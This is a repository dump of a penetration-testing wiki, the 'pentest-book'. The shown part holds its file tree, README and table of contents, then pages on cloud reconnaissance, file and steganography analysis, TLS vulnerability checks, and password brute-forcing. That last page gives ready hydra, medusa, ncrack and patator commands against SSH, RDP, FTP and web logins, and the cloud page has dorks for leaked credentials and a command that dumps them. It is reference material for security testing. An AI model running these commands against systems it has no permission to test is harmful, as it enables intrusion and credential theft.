├── .gitbook
    └── assets
    │   ├── 20200520131941-1-.jpg
    │   ├── 20200520131941[1].jpg
    │   ├── AzureADvsAD[1].png
    │   ├── E4L0FUtUcAUbI6k.jpeg
    │   ├── MFA.png
    │   ├── Methodology[1].png
    │   ├── Untitled diagram-2025-03-14-131837.png
    │   ├── XSS2.png
    │   ├── assessment-mindset (1) (1) (1).png
    │   ├── assessment-mindset (1) (1).png
    │   ├── assessment-mindset (1).png
    │   ├── assessment-mindset.png
    │   ├── azureadvsad-1-.png
    │   ├── bmc-coffee.gif
    │   ├── e4l0futucaubi6k.jpeg
    │   ├── image (1) (1).png
    │   ├── image (1).png
    │   ├── image (10).png
    │   ├── image (11).png
    │   ├── image (12).png
    │   ├── image (13).png
    │   ├── image (14).png
    │   ├── image (15).png
    │   ├── image (16).png
    │   ├── image (17).png
    │   ├── image (18).png
    │   ├── image (19).png
    │   ├── image (2).png
    │   ├── image (20).png
    │   ├── image (21).png
    │   ├── image (22).png
    │   ├── image (23).png
    │   ├── image (24).png
    │   ├── image (25).png
    │   ├── image (26).png
    │   ├── image (27).png
    │   ├── image (28).png
    │   ├── image (29).png
    │   ├── image (3).png
    │   ├── image (30).png
    │   ├── image (31).png
    │   ├── image (32).png
    │   ├── image (33).png
    │   ├── image (34).png
    │   ├── image (35).png
    │   ├── image (36).png
    │   ├── image (37).png
    │   ├── image (38).png
    │   ├── image (39).png
    │   ├── image (4).png
    │   ├── image (40).png
    │   ├── image (41).png
    │   ├── image (42).png
    │   ├── image (43).png
    │   ├── image (44).png
    │   ├── image (45).png
    │   ├── image (46).png
    │   ├── image (47).png
    │   ├── image (48).png
    │   ├── image (49).png
    │   ├── image (5).png
    │   ├── image (50).png
    │   ├── image (51).png
    │   ├── image (6).png
    │   ├── image (7).png
    │   ├── image (8).png
    │   ├── image (9).png
    │   ├── image.png
    │   ├── imagen (1).png
    │   ├── imagen (10).png
    │   ├── imagen (11).png
    │   ├── imagen (12).png
    │   ├── imagen (13).png
    │   ├── imagen (14).png
    │   ├── imagen (15).png
    │   ├── imagen (16).png
    │   ├── imagen (17).png
    │   ├── imagen (18).png
    │   ├── imagen (19).png
    │   ├── imagen (2).png
    │   ├── imagen (20).png
    │   ├── imagen (21).png
    │   ├── imagen (23) (1).png
    │   ├── imagen (23).png
    │   ├── imagen (3).png
    │   ├── imagen (4).png
    │   ├── imagen (5).png
    │   ├── imagen (6).png
    │   ├── imagen (7) (1).png
    │   ├── imagen (7).png
    │   ├── imagen (8).png
    │   ├── imagen (9).png
    │   ├── imagen.png
    │   ├── methodology-1-.png
    │   ├── mfa.png
    │   ├── pentest_ad-min.png
    │   ├── pentest_ad.png
    │   ├── photo_2020-06-08_07-24-17.jpg
    │   ├── six2dez-gitbook_v1.pdf
    │   ├── xss2.png
    │   ├── y7ipicwvp5d41-1-.png
    │   └── y7ipicwvp5d41[1].png
├── .github
    └── FUNDING.yml
├── README.md
├── SUMMARY.md
├── _config.yml
├── enumeration
    ├── cloud
    │   ├── README.md
    │   ├── aws.md
    │   ├── azure.md
    │   ├── cdn-comain-fronting.md
    │   ├── cloud-info-recon.md
    │   ├── docker-and-and-kubernetes.md
    │   ├── gcp.md
    │   └── general.md
    ├── files.md
    ├── ports.md
    ├── ssl-tls.md
    ├── web
    │   ├── README.md
    │   ├── broken-links.md
    │   ├── bruteforcing.md
    │   ├── clickjacking.md
    │   ├── command-injection.md
    │   ├── cookie-padding.md
    │   ├── cors.md
    │   ├── crawl-fuzz.md
    │   ├── crlf.md
    │   ├── csp.md
    │   ├── csrf.md
    │   ├── deserialization.md
    │   ├── dns-rebinding.md
    │   ├── email-attacks.md
    │   ├── general-info.md
    │   ├── header-injections.md
    │   ├── idor.md
    │   ├── lfi-rfi.md
    │   ├── online-hashes-cracked.md
    │   ├── open-redirect.md
    │   ├── open-redirects.md
    │   ├── parameter-pollution.md
    │   ├── pastejacking.md
    │   ├── prototype-pollution.md
    │   ├── quick-tricks.md
    │   ├── request-smuggling.md
    │   ├── session-fixation.md
    │   ├── sqli.md
    │   ├── ssrf.md
    │   ├── ssti.md
    │   ├── tabnabbing.md
    │   ├── upload-bypasses.md
    │   ├── vhosts.md
    │   ├── web-cache-deception.md
    │   ├── web-cache-poisoning.md
    │   ├── web-shells.md
    │   ├── web-sockets.md
    │   ├── xss.md
    │   └── xxe.md
    └── webservices
    │   ├── .net.md
    │   ├── 2fa.md
    │   ├── README.md
    │   ├── adobe-aem.md
    │   ├── apis.md
    │   ├── drupal.md
    │   ├── elk.md
    │   ├── firebase.md
    │   ├── firebird.md
    │   ├── flash-swf.md
    │   ├── flask.md
    │   ├── github.md
    │   ├── gitlab.md
    │   ├── graphql.md
    │   ├── gwt.md
    │   ├── iis.md
    │   ├── jboss-java-deserialization.md
    │   ├── jenkins.md
    │   ├── jira.md
    │   ├── joomla.md
    │   ├── js.md
    │   ├── jwt.md
    │   ├── magento.md
    │   ├── mfa.md
    │   ├── nginx.md
    │   ├── nosql-and-and-mongodb.md
    │   ├── oauth.md
    │   ├── oidc-open-id-connect.md
    │   ├── onelogin-saml-login.md
    │   ├── others.md
    │   ├── owa.md
    │   ├── php.md
    │   ├── python.md
    │   ├── ror-ruby-on-rails.md
    │   ├── sap.md
    │   ├── sharepoint.md
    │   ├── symfony-and-and-twig.md
    │   ├── tomcat.md
    │   ├── vhosts.md
    │   ├── wafs.md
    │   ├── webdav.md
    │   └── wordpress.md
├── exploitation
    ├── file-transfer.md
    ├── payloads.md
    └── reverse-shells.md
├── img
    ├── assessment-mindset (1) (1).png
    ├── assessment-mindset (1).png
    ├── assessment-mindset.png
    ├── bmc-coffee.gif
    └── image.png
├── index.md
├── mobile
    ├── android.md
    ├── general.md
    └── ios.md
├── others
    ├── bugbounty.md
    ├── burp.md
    ├── code-review.md
    ├── dictionaries.md
    ├── exploiting.md
    ├── internal-pentest.md
    ├── llm-ai-ml-prompt-testing.md
    ├── master-assessment-mindmap.md
    ├── password-cracking.md
    ├── recon-suites-review.md
    ├── subdomain-tools-review.md
    ├── tools-everywhere.md
    ├── virtualbox.md
    ├── web-checklist.md
    └── web-fuzzers-comparision.md
├── post-exploitation
    ├── linux.md
    ├── pivoting.md
    └── windows
    │   ├── README.md
    │   ├── ad.md
    │   ├── ad
    │       ├── README.md
    │       └── kerberos-attacks.md
    │   ├── kerberos-attacks.md
    │   └── ps-tips-and-tricks.md
├── recon
    ├── domain-enum.md
    ├── host-scanning.md
    ├── network-scanning.md
    ├── packet-scanning.md
    ├── public-info-gathering.md
    ├── subdomain-enum
    │   ├── README.md
    │   └── subdomain-takeover.md
    └── webs-recon.md
└── sections
    ├── enum
        ├── README.md
        ├── cloud.md
        ├── files.md
        ├── ports.md
        └── web
        │   ├── README.md
        │   └── webservices.md
    ├── exploitation.md
    ├── mobile.md
    ├── others.md
    ├── post.md
    └── recon.md
https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/photo_2020-06-08_07-24-17.jpg
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: six2dez
2 | custom: ["buymeacoffee.com/six2dez","https://www.blockchain.com/btc/address/bc1qtpjy68ls0nhwj9aveqkqthzrryp6cewh5p9sdr","https://www.paypal.com/paypalme/six2dez"]
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | description: >-
3 |   This book contains a bunch of info, scripts and knowledge used during my
4 |   pentests.
5 | ---
6 |
7 | # /home/six2dez/.pentest-book
8 |
9 | Thanks for visiting this site. Please consider enhancing this book with any awesome tools or techniques you know. You can contact me by Telegram ([@six2dez](https://t.me/six2dez)), Twitter ([@six2dez1](https://twitter.com/Six2dez1)) or Discord (six2dez#8201); GitHub pull requests are welcome too ;) **Hack 'em all**
10 |
11 | ### **Usage: Just use the search bar at the top or navigate through the sections on the left. Enjoy it** :blush:
12 |
13 | **Don't know where to go now?** Let me introduce you to some of the most **popular pages** on this wiki:
14 |
15 | * Know your target! Make a proper [recon](recon/public-info-gathering.md)!
16 | * What can you do in those strange [ports](enumeration/ports.md)?
17 | * Doing a [web pentest](enumeration/web/)? Don't forget to check out any of these common attacks!
18 | * Do you have the same hype as me with [cloud](enumeration/cloud/) services? They also have their vulnerabilities
19 | * Stuck again with Windows and [Kerberos](post-exploitation/windows/ad/kerberos-attacks.md)? Here is my cheatsheet
20 | * The mobile world does not stop growing, see my tips for [Android](mobile/android.md) and [iOS](mobile/ios.md)
21 | * [Burp Suite](others/burp.md) is the tool most loved by everyone, but you have to know a few tricks; also check my [preferred extensions](others/burp.md#preferred-extensions)
22 | * I'm really proud of [Pentesting Web Checklist](others/web-checklist.md)
23 | * If you want to know which web fuzzer fits you best, take a look at the [comparison](others/web-fuzzers-comparision.md).
24 |
25 | **Important note**: I use this wiki daily for my work and I am constantly updating it. I'm very sorry if a link to a page changes or I move it; if you need something, feel free to contact me.
26 |
27 | You can support this work by buying me a coffee:
28 |
29 | {% embed url="https://www.buymeacoffee.com/six2dez" %}
30 |
31 |
32 |
33 | ### Stargazers over time
34 |
35 | ![Stargazers over time](https://starchart.cc/six2dez/pentest-book.svg)
36 |
37 |
--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
1 | # Table of contents
2 |
3 | * [/home/six2dez/.pentest-book](README.md)
4 | * [Contribute/Donate](https://www.buymeacoffee.com/six2dez)
5 |
6 | ## Recon
7 |
8 | * [Public info gathering](recon/public-info-gathering.md)
9 | * [Root domains](recon/domain-enum.md)
10 | * [Subdomain Enum](recon/subdomain-enum/README.md)
11 |   * [Subdomain Takeover](recon/subdomain-enum/subdomain-takeover.md)
12 | * [Webs recon](recon/webs-recon.md)
13 | * [Network Scanning](recon/network-scanning.md)
14 | * [Host Scanning](recon/host-scanning.md)
15 | * [Packet Scanning](recon/packet-scanning.md)
16 |
17 | ## Enumeration
18 |
19 | * [Files](enumeration/files.md)
20 | * [SSL/TLS](enumeration/ssl-tls.md)
21 | * [Ports](enumeration/ports.md)
22 | * [Web Attacks](enumeration/web/README.md)
23 |   * [General Info](enumeration/web/general-info.md)
24 |   * [Quick tricks](enumeration/web/quick-tricks.md)
25 |   * [Header injections](enumeration/web/header-injections.md)
26 |   * [Bruteforcing](enumeration/web/bruteforcing.md)
27 |   * [Online hashes cracked](enumeration/web/online-hashes-cracked.md)
28 |   * [Crawl/Fuzz](enumeration/web/crawl-fuzz.md)
29 |   * [LFI/RFI](enumeration/web/lfi-rfi.md)
30 |   * [File upload](enumeration/web/upload-bypasses.md)
31 |   * [SQLi](enumeration/web/sqli.md)
32 |   * [SSRF](enumeration/web/ssrf.md)
33 |   * [Open redirects](enumeration/web/open-redirects.md)
34 |   * [XSS](enumeration/web/xss.md)
35 |   * [CSP](enumeration/web/csp.md)
36 |   * [XXE](enumeration/web/xxe.md)
37 |   * [Cookie Padding](enumeration/web/cookie-padding.md)
38 |   * [Webshells](enumeration/web/web-shells.md)
39 |   * [CORS](enumeration/web/cors.md)
40 |   * [CSRF](enumeration/web/csrf.md)
41 |   * [Web Cache Poisoning](enumeration/web/web-cache-poisoning.md)
42 |   * [Broken Links](enumeration/web/broken-links.md)
43 |   * [Clickjacking](enumeration/web/clickjacking.md)
44 |   * [HTTP Request Smuggling](enumeration/web/request-smuggling.md)
45 |   * [Web Sockets](enumeration/web/web-sockets.md)
46 |   * [CRLF](enumeration/web/crlf.md)
47 |   * [IDOR](enumeration/web/idor.md)
48 |   * [Web Cache Deception](enumeration/web/web-cache-deception.md)
49 |   * [Session fixation](enumeration/web/session-fixation.md)
50 |   * [Email attacks](enumeration/web/email-attacks.md)
51 |   * [Pastejacking](enumeration/web/pastejacking.md)
52 |   * [HTTP Parameter pollution](enumeration/web/parameter-pollution.md)
53 |   * [SSTI](enumeration/web/ssti.md)
54 |   * [Prototype Pollution](enumeration/web/prototype-pollution.md)
55 |   * [Command Injection](enumeration/web/command-injection.md)
56 |   * [Deserialization](enumeration/web/deserialization.md)
57 |   * [DNS rebinding](enumeration/web/dns-rebinding.md)
58 | * [Web Technologies](enumeration/webservices/README.md)
59 |   * [APIs](enumeration/webservices/apis.md)
60 |   * [JS](enumeration/webservices/js.md)
61 |   * [ASP.NET](enumeration/webservices/.net.md)
62 |   * [JWT](enumeration/webservices/jwt.md)
63 |   * [GitHub](enumeration/webservices/github.md)
64 |   * [GitLab](enumeration/webservices/gitlab.md)
65 |   * [WAFs](enumeration/webservices/wafs.md)
66 |   * [Firebird](enumeration/webservices/firebird.md)
67 |   * [Wordpress](enumeration/webservices/wordpress.md)
68 |   * [WebDav](enumeration/webservices/webdav.md)
69 |   * [Joomla](enumeration/webservices/joomla.md)
70 |   * [Jenkins](enumeration/webservices/jenkins.md)
71 |   * [IIS](enumeration/webservices/iis.md)
72 |   * [VHosts](enumeration/webservices/vhosts.md)
73 |   * [Firebase](enumeration/webservices/firebase.md)
74 |   * [OWA](enumeration/webservices/owa.md)
75 |   * [OAuth](enumeration/webservices/oauth.md)
76 |   * [Flask](enumeration/webservices/flask.md)
77 |   * [Symfony && Twig](enumeration/webservices/symfony-and-and-twig.md)
78 |   * [Drupal](enumeration/webservices/drupal.md)
79 |   * [NoSQL (MongoDB, CouchDB)](enumeration/webservices/nosql-and-and-mongodb.md)
80 |   * [PHP](enumeration/webservices/php.md)
81 |   * [RoR (Ruby on Rails)](enumeration/webservices/ror-ruby-on-rails.md)
82 |   * [JBoss - Java Deserialization](enumeration/webservices/jboss-java-deserialization.md)
83 |   * [OneLogin - SAML Login](enumeration/webservices/onelogin-saml-login.md)
84 |   * [Flash SWF](enumeration/webservices/flash-swf.md)
85 |   * [Nginx](enumeration/webservices/nginx.md)
86 |   * [Python](enumeration/webservices/python.md)
87 |   * [Tomcat](enumeration/webservices/tomcat.md)
88 |   * [Adobe AEM](enumeration/webservices/adobe-aem.md)
89 |   * [Magento](enumeration/webservices/magento.md)
90 |   * [SAP](enumeration/webservices/sap.md)
91 |   * [MFA/2FA](enumeration/webservices/mfa.md)
92 |   * [GWT](enumeration/webservices/gwt.md)
93 |   * [Jira](enumeration/webservices/jira.md)
94 |   * [OIDC (Open ID Connect)](enumeration/webservices/oidc-open-id-connect.md)
95 |   * [ELK](enumeration/webservices/elk.md)
96 |   * [Sharepoint](enumeration/webservices/sharepoint.md)
97 |   * [Others](enumeration/webservices/others.md)
98 | * [Cloud](enumeration/cloud/README.md)
99 |   * [General](enumeration/cloud/general.md)
100 |   * [Cloud Info Gathering](enumeration/cloud/cloud-info-recon.md)
101 |   * [AWS](enumeration/cloud/aws.md)
102 |   * [Azure](enumeration/cloud/azure.md)
103 |   * [GCP](enumeration/cloud/gcp.md)
104 |   * [Docker && Kubernetes](enumeration/cloud/docker-and-and-kubernetes.md)
105 |   * [CDN - Domain Fronting](enumeration/cloud/cdn-comain-fronting.md)
106 |
107 | ## Exploitation
108 |
109 | * [Payloads](exploitation/payloads.md)
110 | * [Reverse Shells](exploitation/reverse-shells.md)
111 | * [File transfer](exploitation/file-transfer.md)
112 |
113 | ## Post Exploitation
114 |
115 | * [Linux](post-exploitation/linux.md)
116 | * [Pivoting](post-exploitation/pivoting.md)
117 | * [Windows](post-exploitation/windows/README.md)
118 |   * [AD](post-exploitation/windows/ad/README.md)
119 |     * [Kerberos](post-exploitation/windows/ad/kerberos-attacks.md)
120 |   * [PS tips & tricks](post-exploitation/windows/ps-tips-and-tricks.md)
121 |
122 | ## Mobile
123 |
124 | * [General](mobile/general.md)
125 | * [Android](mobile/android.md)
126 | * [iOS](mobile/ios.md)
127 |
128 | ## Others
129 |
130 | * [Burp Suite](others/burp.md)
131 | * [Password cracking](others/password-cracking.md)
132 | * [VirtualBox](others/virtualbox.md)
133 | * [LLM/AI/ML/prompt testing](others/llm-ai-ml-prompt-testing.md)
134 | * [Code review](others/code-review.md)
135 | * [Pentesting Web checklist](others/web-checklist.md)
136 | * [Internal Pentest](others/internal-pentest.md)
137 | * [Web fuzzers review](others/web-fuzzers-comparision.md)
138 | * [Recon suites review](others/recon-suites-review.md)
139 | * [Subdomain tools review](others/subdomain-tools-review.md)
140 | * [Random](others/dictionaries.md)
141 | * [Master assessment mindmaps](others/master-assessment-mindmap.md)
142 | * [BugBounty](others/bugbounty.md)
143 | * [Exploiting](others/exploiting.md)
144 | * [tools everywhere](others/tools-everywhere.md)
145 |
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | title: pentest-book
4 | theme: jekyll-theme-hacker
5 | markdown: kramdown
6 | highlighter: rouge
7 | tipue_search:
8 |   include:
9 |     pages: true
10 |
--------------------------------------------------------------------------------
/enumeration/cloud/README.md:
--------------------------------------------------------------------------------
1 | # Cloud
2 |
3 | * [General](general.md)
4 | * [AWS](aws.md)
5 | * [Azure](azure.md)
6 | * [Google Cloud Platform](gcp.md)
7 | * [Cloud Info Gathering](cloud-info-recon.md)
8 | * [Docker && Kubernetes](docker-and-and-kubernetes.md)
9 | * [CDNs](cdn-comain-fronting.md)
10 |
11 |
--------------------------------------------------------------------------------
/enumeration/cloud/cdn-comain-fronting.md:
--------------------------------------------------------------------------------
1 | # CDN - Domain Fronting
2 |
3 | ```text
4 | CDN - Domain Fronting
5 |
6 | **Tools**
7 | https://github.com/rvrsh3ll/FindFrontableDomains
8 | https://github.com/stevecoward/domain-fronting-tools
9 | # Domain Fronting TLS 1.3
10 | https://github.com/SixGenInc/Noctilucent
11 | https://github.com/vysecurity/DomainFrontingLists
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/enumeration/cloud/cloud-info-recon.md:
--------------------------------------------------------------------------------
1 | # Cloud Info Gathering
2 |
3 |
4 |
5 | ```text
6 | # Azure IP Ranges
7 | https://azurerange.azurewebsites.net/
8 |
9 | # AWS IP Range
10 | https://ip-ranges.amazonaws.com/ip-ranges.json
11 | - Get creation date
12 | jq .createDate < ip-ranges.json
13 | - Get info for specific region
14 | jq '.prefixes[] | select(.region=="us-east-1")' < ip-ranges.json
15 | - Get all IPs
16 | jq -r '.prefixes | .[].ip_prefix' < ip-ranges.json
17 |
18 | # Online services
19 | https://viewdns.info/
20 | https://securitytrails.com/
21 | https://www.shodan.io/search?query=net%3A%2234.227.211.0%2F24%22
22 | https://censys.io/ipv4?q=s3
23 |
24 | # Azure AD Recon
25 | https://github.com/dievus/Oh365UserFinder
26 |
27 | # AWS Recon
28 | https://github.com/righteousgambit/quiet-riot
29 |
30 | # Google Dorks
31 | site:*.amazonaws.com -www "compute"
32 | site:*.amazonaws.com -www "compute" "ap-south-1"
33 | site:pastebin.com "rds.amazonaws.com" "u " pass OR password
34 | https://storage.googleapis.com/COMPANY
35 |
36 | # Check certificate transparency logs
37 | https://crt.sh
38 | %.netfilx.com
39 |
40 | # Find Cloud Services
41 | python3 cloud_enum.py -k keyword
42 | python3 CloudScraper.py -u https://example.com
43 |
44 | # AWS Buckets
45 | # Dork
46 | site:*.s3.amazonaws.com ext:xls | ext:xlsx | ext:csv password|passwd|pass user|username|uid|email
47 |
48 | # AWS discovering, stealing keys and endpoints
49 | # Nimbostratus - check against actual profile
50 | https://github.com/andresriancho/nimbostratus
51 | python nimbostratus dump-credentials
52 |
53 | # ScoutSuite - audit AWS, GCP and Azure clouds
54 | scout --provider aws --profile stolen
55 |
56 | # Prowler - AWS security assessment, auditing and hardening
57 | https://github.com/toniblyx/prowler
58 | ```
59 |
60 |
--------------------------------------------------------------------------------
/enumeration/files.md:
--------------------------------------------------------------------------------
1 | # Files
2 |
3 | ### Common
4 |
5 | ```bash
6 | # Check real file type
7 | file file.xxx
8 |
9 | # Analyze strings
10 | strings file.xxx
11 | strings -a -n 15 file.xxx # Scan the entire file and output strings of at least 15 chars
12 |
13 | # Check embedded files
14 | binwalk file.xxx # Check
15 | binwalk -e file.xxx # Extract
16 |
17 | # Check as binary file in hex
18 | ghex file.xxx
19 |
20 | # Check metadata
21 | exiftool file.xxx
22 |
23 | # Stego tool for multiple formats
24 | wget https://embeddedsw.net/zip/OpenPuff_release.zip
25 | unzip OpenPuff_release.zip -d ./OpenPuff
26 | wine OpenPuff/OpenPuff_release/OpenPuff.exe
27 |
28 | # Compressed files
29 | fcrackzip file.zip
30 | # https://github.com/priyankvadaliya/Zip-Cracker-
31 | python zipcracker.py -f testfile.zip -d passwords.txt
32 | python zipcracker.py -f testfile.zip -d passwords.txt -o extractdir
33 |
34 | # Office documents
35 | # https://github.com/assafmo/xioc
36 |
37 | # Zip files in website
38 | pip install remotezip
39 | # list contents of a remote zip file
40 | remotezip -l "http://site/bigfile.zip"
41 | # extract file.txt from a remote zip file
42 | remotezip "http://site/bigfile.zip" "file.txt"
43 |
44 | # Grep inside any files
45 | # https://github.com/phiresky/ripgrep-all
46 | rga "whatever" folder/
47 | ```
48 |
49 | ### Disk files
50 |
51 | ```bash
52 | # guestmount can mount any kind of disk file
53 | sudo apt-get install libguestfs-tools
54 | guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
55 | ```
56 |
57 | ### Audio
58 |
59 | ```bash
60 | # Check spectrogram
61 | wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb
62 | dpkg -i sonic-visualiser_4.0_amd64.deb
63 |
64 | # Check for Stego
65 | hideme stego.mp3 -f && cat output.txt #AudioStego
66 | ```
67 |
68 | ### Images
69 |
70 | ```bash
71 | # Stego
72 | wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
73 | chmod +x stegsolve.jar
74 | java -jar stegsolve.jar
75 |
76 | # Stegpy
77 | stegpy -p file.png
78 |
79 | # Check png corrupted
80 | pngcheck -v image.jpeg
81 |
82 | # Check what kind of image it is
83 | identify -verbose image.jpeg
84 |
85 | # Stegseek
86 | # https://github.com/RickdeJager/stegseek
87 | stegseek --seed file.jpg
88 | stegseek file.jpg rockyou.txt
89 | ```
90 |
91 |
--------------------------------------------------------------------------------
/enumeration/ssl-tls.md:
--------------------------------------------------------------------------------
1 | # SSL/TLS
2 |
3 | ## DROWN
4 |
5 | ```bash
6 | # Check for "SSLv2 supported"
7 | nmap -p- -sV -sC example.com
8 | ```
9 |
10 | ## TLS\_FALLBACK\_SCSV
11 |
12 | ```bash
13 | # Check in the lower port
14 | openssl s_client -tls1 -fallback_scsv -connect example.com:443
15 | # - Response:
16 | # tlsv1 alert inappropriate fallback:s3_pkt.c:1262:SSL alert number 86
17 | ```
18 |
19 | ## BEAST
20 |
21 | ```bash
22 | # TLSv1.0 and CBC ciphers
23 | openssl s_client -[sslv3/tls1] -cipher CBC_CIPHER -connect example.com:443
24 | ```
25 |
26 | ## LUCKY13
27 |
28 | ```bash
29 | openssl s_client -cipher CBC_CIPHER -connect example.com:443
30 | ```
31 |
32 | ## Sweet32
33 |
34 | ```bash
35 | openssl s_client -cipher 3DES -connect example.com:443
36 | ```
37 |
38 | ## Logjam
39 |
40 | ```bash
41 | # Check the "Server Temp Key" response is bigger than 1024 (only in OpenSSL 1.0.2 or better)
42 | openssl s_client -connect www.example.com:443 -cipher "EDH"
43 | ```
44 |
45 | ## SSLv2 Support
46 |
47 | ```bash
48 | # If it is supported, this returns the server certificate information; if not, an error
49 | openssl s_client -ssl2 -connect example.com:443
50 | ```
51 |
52 | ## SSLv3 Support
53 |
54 | ```bash
55 | # If it is supported, this returns the server certificate information; if not, an error
56 | openssl s_client -ssl3 -connect google.com:443
57 | ```
58 |
59 | ## Cipher suites
60 |
61 | ```bash
62 | # Cipher Suites
63 | nmap --script ssl-enum-ciphers -p 443 example.com
64 |
65 | # - Anon cipher (fail)
66 | openssl s_client -cipher aNULL -connect example.com:443
67 |
68 | # - DES Cipher (fail)
69 | openssl s_client -cipher DES -connect example.com:443
70 |
71 | # - 3DES Cipher (fail)
72 | openssl s_client -cipher 3DES -connect example.com:443
73 |
74 | # - Export Cipher (fail)
75 | openssl s_client -cipher EXPORT -connect example.com:443
76 |
77 | # - Low Cipher (fail)
78 | openssl s_client -cipher LOW -connect example.com:443
79 |
80 | # - RC4 Cipher (fail)
81 | openssl s_client -cipher RC4 -connect example.com:443
82 |
83 | # - NULL Cipher (fail)
84 | openssl s_client -cipher NULL -connect example.com:443
85 |
86 | # - Perfect Forward Secrecy Cipher (This should NOT fail):
87 | openssl s_client -cipher 'EECDH:EDH' -connect example.com:443
88 | ```
89 |
90 | ## Secure renegotiation
91 |
92 | ```bash
93 | # Check secure renegotiation is not supported
94 | # If not, send request in the renegotiation
95 | # Once sent, if it's vulnerable it shouldn't return error
96 | openssl s_client -connect example.com:443
97 | HEAD / HTTP/1.0
98 | R
99 | #
100 | ```
101 |
102 | ## CRIME
103 |
104 | ```bash
105 | # Check for "Compression: NONE"
106 | openssl s_client -connect example.com:443
107 | ```
108 |
109 | ## BREACH
110 |
111 | ```bash
112 | # If the response contains encoded data, host is vulnerable
113 | openssl s_client -connect example.com:443
114 | GET / HTTP/1.1
115 | Host: example.com
116 | Accept-Encoding: compress, gzip
117 | ```
118 |
119 | ## Heartbleed
120 |
121 | ```bash
122 | # Heartbleed
123 | nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com
124 |
125 | # Heartbleed checker oneliner from sites list
126 | cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
127 | ```
128 |
129 | ## Change cipher spec injection
130 |
131 | ```bash
132 | nmap -p 443 --script ssl-ccs-injection example.com
133 | ```
134 |
135 | ## Cipher order enforcement
136 |
137 | ```bash
138 | # Choose a protocol and 2 different ciphers, one stronger than the other
139 | # Make 2 requests with different cipher order and check in the response if the cipher is the first of the request in both cases
140 | nmap -p 443 --script ssl-enum-ciphers example.com
141 | openssl s_client -tls1_2 -cipher 'AES128-GCM-SHA256:AES128-SHA' -connect contextis.co.uk:443
142 | openssl s_client -tls1_2 -cipher 'AES128-SHA:AES128-GCM-SHA256' -connect contextis.co.uk:443
143 | ```
144 |
145 |
--------------------------------------------------------------------------------
/enumeration/web/README.md:
--------------------------------------------------------------------------------
1 | # Web Attacks
2 |
3 | **Check the left submenu for the common attack you want to review**
4 |
5 | ![](../../.gitbook/assets/y7ipicwvp5d41\[1].png)
6 |
--------------------------------------------------------------------------------
/enumeration/web/broken-links.md:
--------------------------------------------------------------------------------
1 | # Broken Links
2 |
3 | ## Tools
4 |
5 | ```bash
6 | # https://github.com/stevenvachon/broken-link-checker
7 | blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/enumeration/web/bruteforcing.md:
--------------------------------------------------------------------------------
1 | # Bruteforcing
2 |
3 | ```bash
4 | cewl
5 | hash-identifier
6 | # https://github.com/HashPals/Name-That-Hash
7 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
8 | medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
9 | ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
10 | crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
11 | patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
12 | hydra -l root -P password-file.txt 10.11.1.111 ssh
13 | hydra -P password-file.txt -v 10.11.1.111 snmp
14 | hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 ftp -V
15 | hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 pop3 -V
16 | hydra -P /usr/share/wordlists/nmap.lst 10.11.1.111 smtp -V
17 | hydra -L username.txt -p paswordl33t -t 4 ssh://10.10.1.111
18 | hydra -L user.txt -P pass.txt 10.10.1.111 ftp
19 |
20 | # PATATOR
21 | patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
22 |
23 | # SIMPLE LOGIN GET
24 | hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
25 |
26 | # GET FORM with HTTPS
27 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
28 |
29 | # SIMPLE LOGIN POST
30 | hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
31 |
32 | # API REST LOGIN POST
33 | hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
34 |
35 | # Password spraying bruteforcer
36 | # https://github.com/x90skysn3k/brutespray
37 | python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
38 |
39 | # Password generator
40 | # https://github.com/edoardottt/longtongue
41 | python3 longtongue.py
42 |
43 | # https://many-passwords.github.io/
44 | ```
45 |
--------------------------------------------------------------------------------
/enumeration/web/clickjacking.md:
--------------------------------------------------------------------------------
1 | # Clickjacking
2 |
3 | ## General
4 |
5 | {% hint style="info" %}
6 | Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.
7 |
8 | * Preventions:
